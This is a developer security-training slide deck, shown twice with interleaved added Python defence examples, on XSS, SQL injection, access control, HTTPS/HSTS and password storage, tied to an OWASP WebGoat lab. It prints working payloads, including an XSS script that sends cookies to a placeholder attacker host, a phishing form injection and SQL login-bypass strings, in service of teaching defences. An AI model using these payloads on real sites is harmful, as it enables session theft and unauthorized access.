Developer-first security
Integrating Security into Development

Michael Coates
michael@ShapeSecurity.com
michael-coates.blogspot.com
@_mwc
About Me

michael@shapesecurity.com
Reality
"The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine"

http://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking
http://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/
Data Loss & Breaches
(Chart sources: datalossdb.org; Verizon Data Breach Report 2013)
Outside Attackers
(Chart sources: datalossdb.org; Verizon Data Breach Report 2013)
Security - Into The Details
• Sample and Demo of Top Application Risks
  — Cross Site Scripting, SQL Injection, Access Control
• Who's Monitoring Your Traffic?
  — Encrypting in Transit
• Secure Data Storage & Protection
  — Correct Password Storage & Data Protection
• Growing Threats Plaguing Applications
WARNING
Security Testing is ILLEGAL ON UNAUTHORIZED SYSTEMS
3 Dangerous Vulnerabilities
Cross Site Scripting
SQL Injection
Access Control
What are Web Requests
• Open console & enter the following:
  telnet google.com 80
  GET / HTTP/1.1
• Hit return 2 times
Cross Site Scripting (XSS)
• Problem: User controlled data returned in HTTP response contains HTML/JavaScript code
• Impact: Session Hijacking, Full Control of Page, Malicious Redirects
• Basic XSS Test:
  "><script>alert(document.cookie)</script>
• Cookie Theft Example:
  "><script>document.location='http://attackersite/'+document.cookie</script>
XSS Behind The Scenes
http://shinypage.com?user=Bob

JSP Code
<h1>Glad to see you <%= request.getParameter("name") %></h1>

HTML Source / Rendered HTML
<div>Glad to see you <b>Bob</b></div>
XSS Behind The Scenes
http://shinypage.com?user=friend</b><br><form method="post" action="badsite.com/login">Login: <input type="text" name="username"><br>Password:<input type="password" name="password"><input type="submit" value="Submit" /></form>

XSS - Injecting HTML
Rendered HTML (the injected login form is displayed as part of the page)
Cross Site Scripting
• Cross Site Scripting typically uses JavaScript to do bad things
• Steal session cookies
  <script>alert(document.cookie)</script>
• Redirect to bad pages
  <script>window.location = "http://evilsite.com/"</script>
• Rewrite page on the fly
Lab! - Reflected XSS
Reflected XSS Lab
• Lesson: Cross-Site Scripting->Reflected XSS Attacks
• Proxy Not Needed
Lab! - Stored XSS
Stored XSS Lab
• Lesson: Cross-Site Scripting->Stored XSS Attacks
• Proxy Not Needed
XSS Prevention
• Solution
  1. Output Encoding - converts command characters to benign characters for display
  2. Input Validation

<h1>Glad to see you <%=encodeForHTML( request.getParameter("name") ) %></h1>

HTML Encoding
<   &lt;
>   &gt;
"   &quot;
'   &#x27;
&   &amp;
XSS Attempt Revisited
http://shinypage.com?user=friend</b><br><form method="post" action="badsite.com/login">Login: <input type="text" name="username"><br>Password:<input type="password" name="password"><input type="submit" value="Submit" /></form>
Safe Handling
Rendered HTML (the encoded payload is shown as literal text, not parsed as markup)
Glad to see you friend</b><br><form method="post" action="badsite.com/login">Login: <input type="text" name="username"><br>Password:<input type="password" name="password"><input type="submit" value="Submit" /></form>
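The output-encoding fix from the slides, worked through in code. This is an added example, not code from the deck; encode_for_html and the greeting renderers are assumed names standing in for the ESAPI-style encodeForHTML() the JSP line calls, and the two payloads are the deck's own test strings.

```python
"""Output encoding for the HTML body context, applied to the deck's
vulnerable greeting. Added example with assumed function names."""

# The five characters the slides list, with the entity each becomes.
HTML_ENCODE_MAP = {
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
    "&": "&amp;",
}


def encode_for_html(value: str) -> str:
    """Replace HTML control characters with entities so the browser shows
    them as text instead of parsing them as markup. A single pass over the
    input also avoids double-encoding an '&' produced by another entity."""
    return "".join(HTML_ENCODE_MAP.get(ch, ch) for ch in value)


def render_greeting_unsafe(name: str) -> str:
    """The vulnerable JSP pattern from the slides: parameter echoed raw."""
    return f"<h1>Glad to see you {name}</h1>"


def render_greeting_safe(name: str) -> str:
    """The fixed pattern: parameter passed through the encoder first."""
    return f"<h1>Glad to see you {encode_for_html(name)}</h1>"


def contains_injected_markup(html: str, template_tags=("<h1>", "</h1>")) -> bool:
    """Crude check used only to show the difference: any '<' or '>' left
    after removing the template's own tags came from user input."""
    stripped = html
    for tag in template_tags:
        stripped = stripped.replace(tag, "", 1)
    return "<" in stripped or ">" in stripped


# Constructed inputs: the deck's basic XSS test and its login-form injection.
XSS_TEST = '"><script>alert(document.cookie)</script>'
FORM_INJECTION = (
    'friend</b><br><form method="post" action="badsite.com/login">'
    'Login: <input type="text" name="username"><br>'
    'Password:<input type="password" name="password">'
    '<input type="submit" value="Submit" /></form>'
)

if __name__ == "__main__":
    for payload in (XSS_TEST, FORM_INJECTION):
        print("unsafe:", render_greeting_unsafe(payload))
        print("safe:  ", render_greeting_safe(payload))
```

Encoding is context specific: these entities are right for an HTML body, not for a JavaScript string, an attribute without quotes or a URL, which is why the OWASP cheat sheet below lists separate rules per context.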
XSS Resources
• OWASP XSS Prevention Cheat Sheet - http://bit.ly/XSS-OWASP
• Content Security Policy - http://bit.ly/CSP-OWASP
• OWASP XSS Overview - http://bit.ly/OWASPXSS
SQL Injection
• Problem: User controlled data improperly used with SQL statements
• Impact: Arbitrary SQL Execution, Data Corruption, Data Theft
• Basic SQL Injection Tests:
  OR 1=1 --
  ' OR '1'= '1'--
• Example Vulnerable Query:
  sqlQ = "Select user from UserTable where name= '" + username + "' and pass = '" + password + "'"
Lab! - SQL Lesson
SQL Injection
• Lesson: Injection Flaws -> Lab: SQL Injection -> Stage 1: String SQL Injection
• Proxy Needed
• Objective: Bypass the login page by inserting "control" characters. Login as "Neville" w/o knowledge of the password
SQL Injection
• HTTP Post
  employee_id=112&password=x' OR '1'='1 &action=Login
• Vulnerable SQL
  Select user from UserTable where name= '" + username + "' and pass = '" + password + "'
• Resulting Statement
  Select user from UserTable where name= '112' and pass = 'x' OR '1'='1'
• Result: ... name = '112' and pass = 'x' OR TRUE
SQL Injection
• Parameterized Queries
  No confusion with control characters
  Example: would look for password of ' or '1'='1
• Input Validation
  Are special characters needed for most fields?
  What about non-printable characters %00-%0A?
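The deck's login query built by concatenation next to the same query parameterized, run against an in-memory SQLite table so the difference is observable. This is an added example, not code from the slides or from WebGoat; the table contents, the iteration of the input-validation rule and the function names are constructed here.

```python
"""String-built versus parameterized login query, using the deck's
UserTable layout and its 'x' OR '1'='1 payload. Added example."""
import sqlite3

# The password payload from the deck's HTTP POST slide.
INJECTED_PASSWORD = "x' OR '1'='1"


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one user whose password the attacker does not know."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserTable (user TEXT, name TEXT, pass TEXT)")
    conn.execute("INSERT INTO UserTable VALUES ('Neville', '112', 's3cret')")
    return conn


def login_concat(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Vulnerable: quotes in the input become part of the SQL statement,
    so the WHERE clause turns into ... pass = 'x' OR '1'='1'."""
    sql_q = ("Select user from UserTable where name= '" + username +
             "' and pass = '" + password + "'")
    return [row[0] for row in conn.execute(sql_q)]


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Fixed: placeholders keep the input as data. The driver never splices
    it into the statement, so the server looks for a literal password of
    x' OR '1'='1 and finds nothing."""
    sql_q = "Select user from UserTable where name = ? and pass = ?"
    return [row[0] for row in conn.execute(sql_q, (username, password))]


def looks_like_injection(value: str) -> bool:
    """Input-validation rule from the slides' second bullet: for a field
    that has no business need for them, reject single quotes, SQL comment
    markers and the non-printable bytes %00-%0A."""
    if "'" in value or "--" in value:
        return True
    return any(ord(ch) <= 0x0A for ch in value)


def run_demo() -> dict:
    """Return both outcomes for the deck's payload so they can be compared."""
    conn = make_db()
    return {
        "concat": login_concat(conn, "112", INJECTED_PASSWORD),
        "parameterized": login_parameterized(conn, "112", INJECTED_PASSWORD),
    }


if __name__ == "__main__":
    print(run_demo())
```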

SQL Injection Resources
• https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
Access Control
• Problem: Developers assume some parts of app can't be seen, tampered with or invoked by the user
• Impact: Unauthorized data access, access to privileged functionality
• Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments
• Access Control Failure Example:
  • http://somebadbank.com/showacct?id=101
  • http://somebadbank.com/showacct?id=102
Lab! - Access Control
Access Control Violation
• Lesson: Access Control Flaws>LAB: Role Based Access Control->Stage 1: Bypass Business Layer Access Control
• Proxy Needed
• Objective: Find way to execute "delete" functionality using Tom's account. Delete account "tom"
Access Control Violation
• Hint: Login with Tom and perform available actions (search staff, view profile). Figure out how action name is sent to server

POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1
Host: localhost

employee_id=105&action=ViewProfile
Strong Access Controls
• Access Control Performed Server Side
• Never Relies Upon "Security by Obscurity"
• Be Careful with Identifiers (e.g. id=123)
• Attacker Can Send Anything in Request
• Presentation Layer Controls Can Not Enforce Access Control
Access Control Resources
• https://www.owasp.org/index.php/Access_Control_Cheat_Sheet
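Server-side enforcement for the two failures the slides use, the bank's showacct?id= parameter and the WebGoat action parameter, written as an added example rather than code from the slides or from WebGoat. The account-owner table, the role-to-action table and the user names other than Tom are constructed for the example.

```python
"""Server-side access control for an object identifier (showacct?id=) and
for an action name (action=...). Added example with constructed data."""
from urllib.parse import parse_qs

# Constructed records the server trusts; nothing here comes from the request.
ACCOUNT_OWNERS = {"101": "alice", "102": "bob"}
ROLE_ACTIONS = {
    "employee": {"SearchStaff", "ViewProfile"},
    "manager": {"SearchStaff", "ViewProfile", "DeleteProfile"},
}
USER_ROLES = {"tom": "employee", "jerry": "manager"}


class Forbidden(Exception):
    """Raised when the authenticated user may not perform the request."""


def show_account(session_user: str, query_string: str) -> str:
    """Handler for /showacct?id=N. The id is attacker-controlled, so the
    decision is made by comparing it with the server's own ownership
    records, not by assuming the user cannot guess other numbers."""
    account_id = parse_qs(query_string).get("id", [""])[0]
    if ACCOUNT_OWNERS.get(account_id) != session_user:
        # Deny unknown ids and other people's ids the same way.
        raise Forbidden(f"{session_user} may not view account {account_id}")
    return f"account {account_id} for {session_user}"


def perform_action(session_user: str, body: str) -> str:
    """Handler for a body such as employee_id=105&action=ViewProfile.
    The menu may hide Delete from employees, but the server must still
    check the role for every action name it receives, because the
    presentation layer cannot enforce access control."""
    action = parse_qs(body).get("action", [""])[0]
    role = USER_ROLES.get(session_user)
    if action not in ROLE_ACTIONS.get(role, set()):
        raise Forbidden(f"{session_user} ({role}) may not perform {action}")
    return f"{action} executed by {session_user}"


def is_allowed(handler, *args) -> bool:
    """Turn the allow/deny decision into a boolean for checks and tests."""
    try:
        handler(*args)
        return True
    except Forbidden:
        return False


if __name__ == "__main__":
    print(is_allowed(show_account, "alice", "id=101"), is_allowed(show_account, "alice", "id=102"))
    print(is_allowed(perform_action, "tom", "employee_id=105&action=DeleteProfile"))
```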
Who's Monitoring Your Traffic?
Insecure Session Management
• Secure login over HTTPS
  • Password submitted encrypted
• Immediate redirect to HTTP
  • Session ID sent cleartext <-- vulnerability point
https://site.com/login -> http://site.com/profile
Vulnerable Redirects
• User requests HTTP page, response redirects HTTPS
• 302 Response is HTTP <-- Vulnerability Point
Secure Design for Communication
• Use HTTPS Throughout Web Site!
• HTTP Strict Transport Security (HSTS)!
  • Opt-in security control
  • Website instructs compatible browser to enable STS for site
  • HSTS Forces (for enabled site):
    • All communication over HTTPS
    • No insecure HTTP requests sent from browser
    • No option for user to override untrusted certificates
Strict Transport Security
• Browser prevents HTTP requests to HSTS site
• Any request to site is "upgraded" to HTTPS
• No clear text HTTP traffic ever sent to HSTS site
• Browser assumes HTTPS for HSTS sites
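The login-then-redirect sequence from the slides, simulated so the vulnerability point and the effect of HSTS can be compared. This is an added example, not code from the slides; it models the relevant browser rules in a few lines rather than driving a real browser, site.com is the deck's placeholder host, and the cookie name and value are constructed. It also covers the Secure cookie flag, which the slides do not mention but which addresses the same leak.

```python
"""Does the session id cross the wire in cleartext after an HTTPS login
redirects to HTTP? Added simulation of HSTS and the Secure flag."""
from urllib.parse import urlsplit


class Browser:
    """Minimal model: a cookie jar and an HSTS host list."""

    def __init__(self) -> None:
        self.cookies = {}        # host -> {cookie name: (value, secure flag)}
        self.hsts_hosts = set()

    def receive(self, url: str, headers: dict) -> None:
        """Apply the security-relevant headers of a constructed response."""
        parts = urlsplit(url)
        for name, value in headers.items():
            if name.lower() == "set-cookie":
                cookie, *attrs = [p.strip() for p in value.split(";")]
                cname, cval = cookie.split("=", 1)
                secure = any(a.lower() == "secure" for a in attrs)
                self.cookies.setdefault(parts.hostname, {})[cname] = (cval, secure)
            elif name.lower() == "strict-transport-security" and parts.scheme == "https":
                # Browsers only honour HSTS when it arrives over HTTPS;
                # an attacker on the path could otherwise strip or forge it.
                self.hsts_hosts.add(parts.hostname)

    def request(self, url: str) -> dict:
        """Return what would go on the wire: final scheme and cookies attached."""
        parts = urlsplit(url)
        scheme = parts.scheme
        if scheme == "http" and parts.hostname in self.hsts_hosts:
            scheme = "https"     # upgraded before any cleartext request is sent
        sent = {}
        for cname, (cval, secure) in self.cookies.get(parts.hostname, {}).items():
            if secure and scheme != "https":
                continue         # Secure cookies never ride on cleartext
            sent[cname] = cval
        return {"scheme": scheme, "cookies": sent}


def session_id_leaks(use_hsts: bool, secure_flag: bool) -> bool:
    """The slides' flow: https login sets the session cookie, then a 302
    sends the browser to http://site.com/profile. True when the session id
    would be transmitted over cleartext HTTP (the vulnerability point)."""
    b = Browser()
    headers = {"Set-Cookie": "JSESSIONID=s3ss10n" + ("; Secure" if secure_flag else "")}
    if use_hsts:
        headers["Strict-Transport-Security"] = "max-age=31536000"
    b.receive("https://site.com/login", headers)
    wire = b.request("http://site.com/profile")
    return wire["scheme"] == "http" and "JSESSIONID" in wire["cookies"]


if __name__ == "__main__":
    for hsts in (False, True):
        for secure in (False, True):
            print(f"hsts={hsts} secure={secure} leaks={session_id_leaks(hsts, secure)}")
```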
Secure Data Storage & Protection
Password Storage
Bad Approaches!
• Your own algorithm
• md5
• encryption
• base64 encoding
• rot 13
• sha1
Good Approach!
• PBKDF2
• Bcrypt
• + Per User Salt
What Are We Protecting?
Correct password hashing protects against:
• Offline attacks of password repository
• Brute Force, Rainbow Attacks

Does not address:
• Guessing easy passwords
• Password theft, disclosure
• Session Hijacking
• Credential Stuffing
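Password storage the way the "Good Approach" column recommends, PBKDF2 with a per-user salt, using only the standard library. This is an added example, not code from the slides; the iteration count, the record layout and the function names are assumptions, and the sample password is one of the deck's constructed credentials.

```python
"""PBKDF2-HMAC-SHA256 password storage with a per-user random salt and a
constant-time verify. Added example; parameters are assumptions."""
import base64
import hashlib
import hmac
import os

# Assumption: tune to your hardware. Higher cost slows offline attacks on a
# stolen repository; it has no effect on online guessing or stuffing.
ITERATIONS = 600_000


def hash_password(password: str, salt: bytes = b"") -> str:
    """Return 'pbkdf2_sha256$iterations$salt$hash'. A fresh 16-byte salt is
    drawn per user unless one is supplied (only useful for tests)."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "$".join([
        "pbkdf2_sha256",
        str(ITERATIONS),
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    ])


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count, then compare in
    constant time so timing does not reveal how many bytes matched."""
    try:
        algo, iters, salt_b64, hash_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 base64.b64decode(salt_b64), int(iters))
    return hmac.compare_digest(digest, base64.b64decode(hash_b64))


def same_password_same_hash(password: str) -> bool:
    """Why the per-user salt matters: two users who both chose the deck's
    'password1' must not share a stored hash, or one cracked record (or a
    precomputed rainbow table) would reveal both."""
    return hash_password(password) == hash_password(password)


if __name__ == "__main__":
    record = hash_password("password1")
    print(record)
    print(verify_password("password1", record), verify_password("guess", record))
    print("salt reused across users:", same_password_same_hash("password1"))
```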
Architecture for Sensitive Data
(Diagram: https://site.com -> web server -> internal SSL -> database)
Monitor Database Queries & Response Size
Encrypting Sensitive Data in Database
(Diagram: user data is encrypted with a Customer/Group Encryption Key; that key is stored in the database encrypted under a Key Encrypting Key held in a Hardware Security Module; decryption runs the same path in reverse)
• Encryption within Database
• Unique keys per data region
• Key encrypting keys
• Hardware Security Modules
Growing Threats Plaguing Applications
Denial of Service
Denial of Service (DOS)
Distributed Denial of Service (DDOS)
Denial of Service
• Network DDOS - Exhaust Network Bandwidth
• Application Layer DDOS (e.g. site.com/generateReport) - Exhaust Server CPU/Memory
Application Denial of Service
Traditional Network DDOS:
• overwhelms target with volume
• exhausts bandwidth / capacity of network devices
• Requires large number of machines
• Defenses: CDN, anti-DDOS services
Application DDOS:
• invokes computationally intense application functions
• exhausts CPU / memory of web servers
• Requires few machines
• Defenses: Few available, must customize
Credential Stuffing
(Diagram: credentials stolen from a compromised server - joe: abc123, sue: password1, bob: MyP0n3y - are replayed one by one against https://site.com/login)
Take Aways
• Understand top security threats and anticipate potential malicious use of application to design secure code
• Multiple controls possible to protect sensitive data in transit and storage
• Understand emerging threats to plan for appropriate defenses
• Use OWASP BWA Security Lab and learn more!
Thanks!
michael@ShapeSecurity.com
http://michael-coates.blogspot.com
@_mwc
Virtual Security Training Lab Setup
Software
• Vulnerable Server: OWASP's Webgoat
• Proxy Tool - OWASP's ZAP (Zed Attack Proxy)
• Browser
• Virtual Machine: OWASP Broken Web App VM
Test Connectivity to VM
1. Open Browser
2. Browse to your VM ip (listed in VM login page)
   • e.g. http://192.168.56.101
3. Should see OWASP BWA welcome page
4. Error? Check ip address of VM
WebGoat
• Click First Link - OWASP WebGoat version 5.3.x
• Username / Password is guest / guest
Understanding the Proxy
• Proxy is middle-man between browser and web server
• Assists with traffic manipulation & inspection
(Diagram: Attacker's Browser -> Web Proxy -> Web Server)
Understanding the Proxy
(Diagram: Your Computer [Primary OS: Browser -> Web Proxy] -> VM [Web Server])
Enabling Proxy
1. Open ZAP
2. Configure Firefox to use proxy
3. Resend Request
4. Confirm received by proxy
5. Forward to web server (vm)
Using A Proxy
• ZAP - Configure to listen on 8080
Set Firefox Proxy
• Set Firefox proxy to 8080
  • Preferences -> Advanced -> Network -> Settings
  • Set HTTP Proxy
  • Important - clear "No Proxy for" line
Confirm Setup Works
• Refresh Web Browser
• Go to ZAP
• See site in left-hand column
Intercepting Traffic
• Add a "breakpoint" by right clicking on the page and choosing "Break..."
• Refresh the webpage - it will hang
• Modify the request as needed, then press the "Continue" button
"Hello World" of Proxies
• Lesson: General->Http Basic
• Objective:
  • Enter your name into text box
  • Intercept with proxy & change entered name to different value
  • Receive response & observe modified value is reversed
(Diagram: Attacker's Browser sends "Joe"; Web Proxy changes it to "Sue"; Web Server responds "euS")
Devbeat Conference - Developer First Security

  • 1. Developer-first security: Integrating Security into Development. Michael Coates, michael@ShapeSecurity.com, michael-coates.blogspot.com, @_mwc
  • 4. “The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine” http://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking http://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/
  • 5. Data Loss & Breaches datalossdb.org Verizon Data Breach Report 2013
  • 7. Security - Into The Details
 — Sample and Demo of Top Application Risks: Cross Site Scripting, SQL Injection, Access Control
 — Who’s Monitoring Your Traffic? Encrypting in Transit
 — Secure Data Storage & Protection: Correct Password Storage & Data Protection
 — Growing Threats Plaguing Applications
  • 8. WARNING Security Testing is ILLEGAL ON UNAUTHORIZED SYSTEMS
  • 9. 3 Dangerous Vulnerabilities Cross Site Scripting SQL Injection Access Control
  • 10. What are Web Requests • Open a console & enter the following:
 telnet google.com 80
 GET / HTTP/1.1
 Host: google.com
 • Hit return 2 times (the blank line ends the request headers; HTTP/1.1 requires the Host header, so send it or the server may answer 400 Bad Request)
  • 11. Cross Site Scripting (XSS) • Problem: user controlled data returned in the HTTP response contains HTML/JavaScript code • Impact: session hijacking, full control of the page, malicious redirects • Basic XSS Test:
 "><script>alert(document.cookie)</script> • Cookie Theft Example:
 "><script>document.location='http://attackersite/'+document.cookie</script>
  • 12. XSS Behind The Scenes • Request: http://shinypage.com?user=Bob • JSP Code: <div>Glad to see you <b><%= request.getParameter("user") %></b></div> • Rendered HTML: <div>Glad to see you <b>Bob</b></div>
  • 13. XSS Behind The Scenes • Request: http://shinypage.com?user=friend</b>
 <br><form method="post" action="badsite.com/login">
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  • 14. XSS - Injecting HTML • Rendered HTML: the browser now shows the attacker’s login form as part of the page
  • 15. Cross Site Scripting • Cross Site Scripting typically uses JavaScript to do bad things • Steal session cookies: <script>alert(document.cookie)</script> • Redirect to bad pages: <script>window.location = "http://evilsite.com/"</script> • Rewrite the page on the fly
  • 17. Reflected XSS Lab • Lesson: Cross-Site Scripting->Reflected XSS Attacks • Proxy Not Needed
  • 19. Stored XSS Lab • Lesson: Cross-Site Scripting>Stored XSS Attacks • Proxy Not Needed
  • 20. XSS Prevention • Solution:
 1. Output Encoding - converts control characters to benign characters for display
 2. Input Validation
 <div>Glad to see you <b><%= encodeForHTML( request.getParameter("user") ) %></b></div>
 HTML encoding: < becomes &lt;   > becomes &gt;   " becomes &quot;   ' becomes &#x27;   & becomes &amp;
  • 21. XSS Attempt Revisited • Request: http://shinypage.com?user=friend</b>
 <br><form method="post" action="badsite.com/login">
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  • 22. Safe Handling • Rendered HTML: the encoded payload is displayed as literal text and no form is created:
 Glad to see you friend</b>
 <br><form method="post" action="badsite.com/login">
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
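The output-encoding fix from slides 20 to 22, as an added example that is not part of the original deck: the same "user" value is rendered once the way the vulnerable JSP does it and once through HTML-entity encoding, and a small counter shows how many real form and input elements a browser would parse out of each result. The template string, the `render_*` function names and the attack value are constructed for this example; `html.escape` is Python's standard-library encoder and maps the five characters listed on slide 20 to the same entities.

```python
import html

# Constructed attack value for the "user" parameter, mirroring slide 13: it closes the
# <b> element the template opened and then injects a fake login form.
ATTACK_USER = (
    'friend</b><br><form method="post" action="badsite.com/login">'
    'Login: <input type="text" name="username"><br>'
    'Password:<input type="password" name="password">'
    '<input type="submit" value="Submit" /></form>'
)


def render_vulnerable(user):
    """The pattern from the JSP on the slide: the parameter is concatenated raw into the markup."""
    return '<div>Glad to see you <b>' + user + '</b></div>'


def render_safe(user):
    """Output encoding: < > & " ' become entities, so the browser shows text instead of parsing tags."""
    return '<div>Glad to see you <b>' + html.escape(user, quote=True) + '</b></div>'


def count_elements(markup, tag):
    """Count how many real <tag ...> elements a browser would parse out of the markup."""
    return markup.lower().count('<' + tag.lower())


if __name__ == '__main__':
    for label, page in (('vulnerable', render_vulnerable(ATTACK_USER)),
                        ('encoded', render_safe(ATTACK_USER))):
        print('%s: %d injected form(s)\n%s\n' % (label, count_elements(page, 'form'), page))
```

Entity encoding is the right answer for data placed in an HTML element body, which is the only context these slides show; a value written into an attribute, a JavaScript string or a URL needs the encoder for that context, which is what the OWASP XSS Prevention Cheat Sheet linked on slide 23 walks through.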
  • 23. XSS Resources • OWASP XSS Prevention Cheat Sheet 
 - http://bit.ly/XSS-OWASP • Content Security Policy 
 - http://bit.ly/CSP-OWASP • OWASP XSS Overview 
 - http://bit.ly/OWASPXSS
  • 24. SQL Injection • Problem: user controlled data improperly used with SQL statements • Impact: arbitrary SQL execution, data corruption, data theft • Basic SQL Injection Tests:
 OR 1=1 --
 ' OR '1'='1'-- • Example Vulnerable Query (string concatenation):
 sqlQ = "SELECT user FROM UserTable WHERE name = '" + username + "' AND pass = '" + password + "'"
  • 25. Lab! - SQL Lesson
  • 26. SQL Injection • Lesson: Injection Flaws -> Lab: SQL Injection -> Stage 1: String SQL Injection • Proxy Needed • Objective: Bypass the login page by inserting “control” characters. Login as “Neville” w/o knowledge of the password
  • 27. SQL Injection • HTTP Post:
 employee_id=112&password=x' OR '1'='1&action=Login • Vulnerable SQL:
 sqlQ = "SELECT user FROM UserTable WHERE name = '" + username + "' AND pass = '" + password + "'" • Resulting Statement:
 SELECT user FROM UserTable WHERE name = '112' AND pass = 'x' OR '1'='1' • Result: AND binds tighter than OR, so this reads (name = '112' AND pass = 'x') OR TRUE; the WHERE clause matches every row and the password check is bypassed
  • 28. SQL Injection • Parameterized Queries: no confusion with control characters; the example above would look for a password of literally ' OR '1'='1 and find nothing • Input Validation: are special characters needed for most fields? What about non-printable characters %00-%0A?
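The concatenated query from slides 24 and 27 next to its parameterized replacement from slide 28, as an added example that is not part of the original deck. It uses Python's standard-library `sqlite3` on an in-memory table; the table contents, the `login_*` and `valid_employee_id` function names and the "112 is Neville" mapping are constructed for this example and are not WebGoat's own data or code.

```python
import sqlite3


def make_db():
    """Constructed in-memory table with two sample users (not WebGoat's real data)."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE UserTable (user TEXT, name TEXT, pass TEXT)')
    conn.executemany('INSERT INTO UserTable VALUES (?, ?, ?)',
                     [('neville', '112', 's3cret'), ('tom', '105', 'tomspass')])
    return conn


def login_concat(conn, username, password):
    """The vulnerable pattern from the slide: user input spliced into the SQL text."""
    sql = ("SELECT user FROM UserTable WHERE name = '" + username +
           "' AND pass = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_param(conn, username, password):
    """Parameterized query: values travel separately from the statement, so a quote is just data."""
    sql = 'SELECT user FROM UserTable WHERE name = ? AND pass = ?'
    return [row[0] for row in conn.execute(sql, (username, password))]


def valid_employee_id(value):
    """Input validation for a field that never needs special characters: digits only, bounded length."""
    return value.isdigit() and 1 <= len(value) <= 6


def run_demo():
    conn = make_db()
    payload = "x' OR '1'='1"   # the password value from the lab's HTTP POST on slide 27
    return {
        'concat': login_concat(conn, '112', payload),   # every row: the OR TRUE wins
        'param': login_param(conn, '112', payload),     # nothing: no user has that password
        'legit': login_param(conn, '112', 's3cret'),    # the real credential still works
        'id_ok': valid_employee_id('112'),
        'id_bad': valid_employee_id(payload),
    }


if __name__ == '__main__':
    for key, value in run_demo().items():
        print(key, value)
```

The concatenated version returns both users because the injected OR makes the WHERE clause true for every row; the parameterized version sends the same text as a bound value and returns nothing. Validation is shown only for the numeric employee_id field, where it is cheap and unambiguous; for free-text fields parameterization is the control that actually removes the injection, validation just narrows what reaches the database.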

  • 30. Access Control • Problem: developers assume some parts of the app can’t be seen, tampered with or invoked by the user • Impact: unauthorized data access, access to privileged functionality • Basic Access Control Test: inspect HTTP requests - iterate numbers, guess other values for arguments • Access Control Failure Example: http://somebadbank.com/showacct?id=101 then http://somebadbank.com/showacct?id=102 (change the id and see whether another customer’s account comes back)

  • 31. Lab! - Access Control
  • 32. Access Control Violation • Lesson: Access Control Flaws>LAB: Role Based Access Control->Stage 1: Bypass Business Layer Access Control • Proxy Needed • Objective: Find way to execute “delete” functionality using Tom’s account. Delete account “tom”
  • 33. Access Control Violation • Hint: Login with Tom and perform available actions (search staff, view profile). Figure out how action name is sent to server POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1 Host: localhost ! employee_id=105&action=ViewProfile
  • 34. Strong Access Controls • Access Control Performed Server Side • Never Relies Upon “Security by Obscurity” • Be Careful with Identifiers (e.g. id=123) • Attacker Can Send Anything in Request • Presentation Layer Controls Can Not Enforce Access Control
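The two access-control failures from slides 30 to 33 (an account id the client can iterate, and an action name the client can change) with the server-side checks slide 34 calls for, as an added example that is not part of the original deck. The account records, the users and their roles, the action names and the `can_*`/`show_account*`/`handle_request` functions are all constructed for this example; the role assignment (tom is an employee who may not delete, a manager may) is an assumption that mirrors the lab's objective, not WebGoat's code.

```python
# Constructed sample data (not from WebGoat): bank accounts with an owner, and staff with roles.
ACCOUNTS = {
    101: {'owner': 'alice', 'balance': 500},
    102: {'owner': 'bob', 'balance': 9000},
}
USERS = {
    'alice': 'customer', 'bob': 'customer',
    'tom': 'employee', 'jerry': 'manager',
}
# Which roles may invoke each action. The action name arrives in the request body
# (action=ViewProfile) exactly as slide 33 shows, so the server must re-check it every time.
ACTION_ROLES = {
    'SearchStaff': {'employee', 'manager'},
    'ViewProfile': {'employee', 'manager'},
    'DeleteProfile': {'manager'},
}


def show_account_insecure(session_user, account_id):
    """The failure on slide 30: whatever id the client sends is looked up and returned."""
    return ACCOUNTS.get(account_id)


def can_view_account(session_user, account_id):
    """Object-level check: the record must exist and belong to the logged-in user."""
    acct = ACCOUNTS.get(account_id)
    return acct is not None and acct['owner'] == session_user


def show_account(session_user, account_id):
    # Deny by default, and give the same answer for "not found" and "not yours" so an
    # attacker iterating ids cannot learn which ones exist.
    if not can_view_account(session_user, account_id):
        return None
    return ACCOUNTS[account_id]


def can_perform(session_user, action):
    """Function-level check: the session user's role (known server side) vs. the requested action."""
    role = USERS.get(session_user)
    return role is not None and role in ACTION_ROLES.get(action, set())


def handle_request(session_user, form):
    """Server handler for a POST like employee_id=105&action=ViewProfile."""
    action = form.get('action', '')
    if not can_perform(session_user, action):
        return 403, 'forbidden'
    return 200, '%s ran %s on employee %s' % (session_user, action, form.get('employee_id'))
```

Nothing in the request is trusted: `session_user` comes from the server-side session, the role comes from the server's own user table, and the id and action from the form are only ever compared against those. Hiding the delete button in Tom's menu (the presentation-layer control the lab bypasses) changes nothing here, because the check runs on every request regardless of what the page offered.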
  • 37. Insecure Session Management • Secure login over HTTPS (https://site.com/login): password submitted encrypted • Immediate redirect to HTTP (http://site.com/profile) • Session ID now sent in cleartext with every request <-- vulnerability point
